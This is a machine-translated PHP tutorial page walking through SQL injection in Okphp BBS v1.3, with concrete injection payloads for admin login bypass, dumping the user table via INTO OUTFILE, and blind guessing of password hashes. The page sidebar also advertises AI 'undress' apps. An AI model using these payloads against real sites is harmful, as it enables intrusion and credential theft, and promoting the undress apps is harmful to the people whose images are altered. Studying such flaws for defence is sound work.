search
HomeBackend DevelopmentPHP TutorialTalk about php attack methods php+mysql injection statement construction_PHP tutorial

Talk about php attack methods php+mysql injection statement construction_PHP tutorial

Jul 21, 2016 pm 03:43 PM
bbsphpphp+mysqloneinformationPrefaceOpen sourceattackmethodVersionstatement

1. Foreword:
Version information: Okphp BBS v1.3 open source version

Due to PHP and MYSQL itself, PHP+MYSQL injection is more difficult than ASP, especially the construction of statements during injection is more difficult. This is a difficult point. This article mainly uses a simple analysis of some files of Okphp BBS v1.3 to talk about the construction method of php+mysql injection statements. I hope this article will be helpful to you.
Statement: All the "vulnerabilities" mentioned in the article have not been tested and may not exist at all. In fact, it does not matter whether there are loopholes. What is important is the analysis ideas and statement structure.
2. "Vulnerability" analysis:
1.admin/login.php injection leads to authentication bypass vulnerability:
Code:

Copy code The code is as follows:

$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username='$username' and password='$password'";
 $res = sql_query($q,$conn);
 $row = sql_fetch_row($res );
 $q = "select id,group_id from $user_table where username='$username' and password='$password'"
 
$username and $password are not filtered, very Easy to bypass.

Methods for modifying statements such as select * from $user_table where username='$username' and password='$password' are:
Construction 1 (using logical operations): $username=' OR 'a'='a $password=' OR 'a'='a
Equivalent to sql statement:
select * from $user_table where username='' OR 'a'='a' and password=' ' OR 'a'='a'
Construction 2 (use the comment statement # in mysql, /* to comment out $password): $username=admin'#(or admin'/*)
That is:
Select * from $user_table where username='admin'#' and password='$password'"
Equivalent to:
select * from $user_table where username='admin'
In admin/ The $password in the $q statement in login.php is md5 encrypted before querying, so it cannot be bypassed by the statement in construction 1. Here we use construction 2:
 select id,group_id from $user_table where username=' admin'#' and password='$password'"
Equivalent to:
select id,group_id from $user_table where username='admin'
This is true as long as there is a user named admin, if you don’t know User name only knows the corresponding id,
We can construct it like this: $username=' OR id=1#
Equivalent to:
select id,group_id from $user_table where username='' OR id =1# and password='$password' (the one after # is commented out)
We then look at the code:
Copy the code The code is as follows :

 if ($row[0]) {
 // If not admin or super moderator
 if ($username != "admin" && !eregi("(^| &)3($|&)",$row[1])) {
$login = 0;
}
else {
$login = 1;
}
}
 // Fail to login---------------
 if (!$login) {
 write_log("Moderator login","0","password wrong");
echo " ";
exit();
}
// Access ! -------------
else {
session_start();

In the end, it is simply judged by a $login. We only need to submit $login=1 directly through IE to bypass it :).
 2. Users/login.php injection leads to authentication bypass vulnerability:
Code:
Copy code The code is as follows:

$md5password = md5($password);
$q = "select id,group_id,email from $user_table where username='$username' and password='$md5password'";
$ res = sql_query($q,$conn);
$row = sql_fetch_row($res);

If $username is not filtered, use the same comment as 1 and password='$md5password'" ;

3. There is an arbitrary deletion log record vulnerability in adminloglist.php (ps: This seems to have nothing to do with php+mysql injection, just mention it)
The backend of okphp seems to be written very sloppily. The file does not determine whether the administrator has logged in, so that it can be accessed arbitrarily. Let’s look at the code of list.php:
Copy the code The code is as follows:

$arr = array("del_log","log_id","del_id");
get_r($arr);
//
if ($del_log) {
Omit...
 if ($log_id) {
 foreach ($log_id as $val) {
 $q = "delete from $log_table where id='$val'";
 $res = sql_query($q,$conn);
 if ($res) {
 $i++;
 }
 }
 }
 elseif ($del_id) {
 $q = "delete from $log_table where id='$del_id'";
 $res = sql_query($q,$conn);
 }
 $tpl->setVariable( "message","$i log deleted ok!");
 $tpl->setVariable("action","index.php?action=list_log");
 }

The code simply uses get_r($arr); to determine the submitted parameters. We only need to submit the corresponding $del_log, $log_id, $del_id. The deletion will be successful.
4. Multiple files do not filter variables, leading to SQL injection vulnerabilities.
The authors of okphp don’t seem to like filtering :). Basically all variables in SQL statements are "naked". I won’t list the specific files. Please read the code yourself. I will use forumslist_threads.php as an example to briefly talk about it.
Look at the code of list_threads.php:
Copy the code The code is as follows:

$q = "select name,belong_id ,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id'";
 $res = sql_query($q,$conn);
 $row = sql_fetch_row($res);

The variable $forum_id is not filtered because mysql does not support subqueries. We can use union construction statements to perform joint queries (requires MySQL version 4.00 or above) to achieve cross-database operations. , we construct it as follows:
Construction 1: Use SELECT * FROM table INTO OUTFILE '/path/file.txt' (mysql is required to have file permissions, please note that the absolute path is required in the win system, such as: c://path/ /file.txt ). Enter the queried content into file.txt, and then we can access the query results through http://ip/path/file.txt. Above we can construct $forum_id like this:
$forum_id=' union select * from user_table into outfile '/path/file.txt'
The following:
$q = "select name,belong_id,moderator, protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id' union select * from user_table into outfile '/path/file.txt'";
The above method requires comparison Harsh, the path to the web must be obtained (usually it can be obtained by submitting wrong variables to cause mysql to report an error), and the magic_gpc=on option of PHP prevents single quotes from appearing in the injection. If magic_gpc=on we can also bypass:
Construction 2: Just like asp cross-database query, directly use union select to construct the statement so that the returned results are different to guess the solution. This method can bypass the single quotes (magic_gpc= on) to continue the injection, but this injection is relatively difficult in PHP, depending on the specific code. For specific statement construction, please refer to pinkeyes' article "php injection example". Below I will give an example of using "different return results" injection combined with okphp: (see vulnerability 5).
5.admin/login.php and users/login.php can be guessed to get the specified user password hash through the SQL statement construction: (Actually, this is the same as vulnerability 1 and 2. It is taken out separately here, mainly to explain the statement. Construction method. )
The problem code is the same as vulnerability 1.
The structure of the statement (ps: because the statement itself is to operate the user library, there is no need to use union):
$username=admin' AND LENGTH(password)=6#
The sql statement becomes:
 $q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6#' and password='$password'"
 Equivalent to:
 $q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6'"
If LENGTH(password)=6 is true, it will return normally. If it is not true, mysql will report an error.
In this way we can guess the user admin password hash. For example, $username=admin' ord(substring(password,1,1))=57#
You can guess the ascii code value of the first digit of the user's password.........

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/320715.htmlTechArticle1. Foreword: Version information: Okphp BBS v1.3 open source version Due to PHP and MYSQL itself, PHP+ MYSQL injection is more difficult than ASP, especially the construction of statements during injection. This...
Statement
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
PHP and Python: Different Paradigms ExplainedPHP and Python: Different Paradigms ExplainedApr 18, 2025 am 12:26 AM

PHP is mainly procedural programming, but also supports object-oriented programming (OOP); Python supports a variety of paradigms, including OOP, functional and procedural programming. PHP is suitable for web development, and Python is suitable for a variety of applications such as data analysis and machine learning.

PHP and Python: A Deep Dive into Their HistoryPHP and Python: A Deep Dive into Their HistoryApr 18, 2025 am 12:25 AM

PHP originated in 1994 and was developed by RasmusLerdorf. It was originally used to track website visitors and gradually evolved into a server-side scripting language and was widely used in web development. Python was developed by Guidovan Rossum in the late 1980s and was first released in 1991. It emphasizes code readability and simplicity, and is suitable for scientific computing, data analysis and other fields.

Choosing Between PHP and Python: A GuideChoosing Between PHP and Python: A GuideApr 18, 2025 am 12:24 AM

PHP is suitable for web development and rapid prototyping, and Python is suitable for data science and machine learning. 1.PHP is used for dynamic web development, with simple syntax and suitable for rapid development. 2. Python has concise syntax, is suitable for multiple fields, and has a strong library ecosystem.

PHP and Frameworks: Modernizing the LanguagePHP and Frameworks: Modernizing the LanguageApr 18, 2025 am 12:14 AM

PHP remains important in the modernization process because it supports a large number of websites and applications and adapts to development needs through frameworks. 1.PHP7 improves performance and introduces new features. 2. Modern frameworks such as Laravel, Symfony and CodeIgniter simplify development and improve code quality. 3. Performance optimization and best practices further improve application efficiency.

PHP's Impact: Web Development and BeyondPHP's Impact: Web Development and BeyondApr 18, 2025 am 12:10 AM

PHPhassignificantlyimpactedwebdevelopmentandextendsbeyondit.1)ItpowersmajorplatformslikeWordPressandexcelsindatabaseinteractions.2)PHP'sadaptabilityallowsittoscaleforlargeapplicationsusingframeworkslikeLaravel.3)Beyondweb,PHPisusedincommand-linescrip

How does PHP type hinting work, including scalar types, return types, union types, and nullable types?How does PHP type hinting work, including scalar types, return types, union types, and nullable types?Apr 17, 2025 am 12:25 AM

PHP type prompts to improve code quality and readability. 1) Scalar type tips: Since PHP7.0, basic data types are allowed to be specified in function parameters, such as int, float, etc. 2) Return type prompt: Ensure the consistency of the function return value type. 3) Union type prompt: Since PHP8.0, multiple types are allowed to be specified in function parameters or return values. 4) Nullable type prompt: Allows to include null values ​​and handle functions that may return null values.

How does PHP handle object cloning (clone keyword) and the __clone magic method?How does PHP handle object cloning (clone keyword) and the __clone magic method?Apr 17, 2025 am 12:24 AM

In PHP, use the clone keyword to create a copy of the object and customize the cloning behavior through the \_\_clone magic method. 1. Use the clone keyword to make a shallow copy, cloning the object's properties but not the object's properties. 2. The \_\_clone method can deeply copy nested objects to avoid shallow copying problems. 3. Pay attention to avoid circular references and performance problems in cloning, and optimize cloning operations to improve efficiency.

PHP vs. Python: Use Cases and ApplicationsPHP vs. Python: Use Cases and ApplicationsApr 17, 2025 am 12:23 AM

PHP is suitable for web development and content management systems, and Python is suitable for data science, machine learning and automation scripts. 1.PHP performs well in building fast and scalable websites and applications and is commonly used in CMS such as WordPress. 2. Python has performed outstandingly in the fields of data science and machine learning, with rich libraries such as NumPy and TensorFlow.

See all articles

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
1 months agoBy尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Best Graphic Settings
1 months agoBy尊渡假赌尊渡假赌尊渡假赌
Will R.E.P.O. Have Crossplay?
1 months agoBy尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Dreamweaver Mac version

Dreamweaver Mac version

Visual web development tools

PhpStorm Mac version

PhpStorm Mac version

The latest (2018.2.1) professional PHP integrated development tool

MantisBT

MantisBT

Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.

SAP NetWeaver Server Adapter for Eclipse

SAP NetWeaver Server Adapter for Eclipse

Integrate Eclipse with SAP NetWeaver application server.

WebStorm Mac version

WebStorm Mac version

Useful JavaScript development tools